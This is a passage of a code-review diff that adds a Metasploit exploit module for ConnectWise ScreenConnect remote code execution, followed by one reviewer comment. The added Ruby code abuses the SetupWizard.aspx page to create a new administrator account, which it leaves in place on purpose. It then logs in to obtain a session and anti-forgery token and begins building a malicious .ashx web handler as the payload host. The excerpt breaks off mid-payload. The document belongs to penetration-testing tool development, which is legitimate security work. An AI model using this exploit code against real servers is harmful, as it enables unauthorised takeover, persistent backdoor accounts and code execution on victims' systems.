modules/exploits/windows/http/connectwise_screenconnect_rce.rb

```diff
@@ -0,0 +1,298 @@
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 2.')
+    end
+
+    viewstate, viewstategen = get_viewstate(res)
+    unless viewstate && viewstategen
+      fail_with(Failure::UnexpectedReply, 'Did not locate the view state from request 2.')
+    end
+
+    #
+    # 3. Create a new administrator account.
+    #
+    admin_username = Rex::Text.rand_text_alpha_lower(8)
+    admin_password = Rex::Text.rand_text_alphanumeric(16)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$userNameBox' => admin_username,
+        'ctl00$Main$wizard$emailBox' => "#{admin_username}@#{Rex::Text.rand_text_alpha_lower(8)}.#{Rex::Text.rand_text_alpha_lower(3)}",
+        'ctl00$Main$wizard$passwordBox' => admin_password,
+        'ctl00$Main$wizard$verifyPasswordBox' => admin_password,
+        'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 3.')
+    end
+
+    print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")
+
+    #
+    # 4. Log in with this account to get an authenticated HTTP session.
+    #
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/Administration'),
+      'keep_cookies' => true,
+      'authorization' => basic_auth(admin_username, admin_password)
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 4.')
+    end
+
+    unless res.body =~ %r{"antiForgeryToken"\s*:\s*"([a-zA-Z0-9+/=]+)"}
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 4.')
+    end
+
+    anti_forgery_token = Regexp.last_match(1)
+
+    #
+    # 5. Create an extension to host the payload.
+    #
+
+    # NOTE: Rex::Text.rand_guid return a GUID string wrapped in curly braces which is not what we want.
+    plugin_guid = [8, 4, 4, 4, 12].map { |a| Rex::Text.rand_text_hex(a) }.join('-')
+
+    payload_ashx = "#{Rex::Text.rand_text_alpha_lower(8)}.ashx"
+
+    payload_handler_class = Rex::Text.rand_text_alpha(8)
+
+    payload_psi_var = Rex::Text.rand_text_alpha(8)
+
+    payload_data = %(<% @ WebHandler Language="C#" Class="#{payload_handler_class}" %>
```

Comment:
Not a blocker; this might come up again in the future - might be useful to have it available for other modules at some point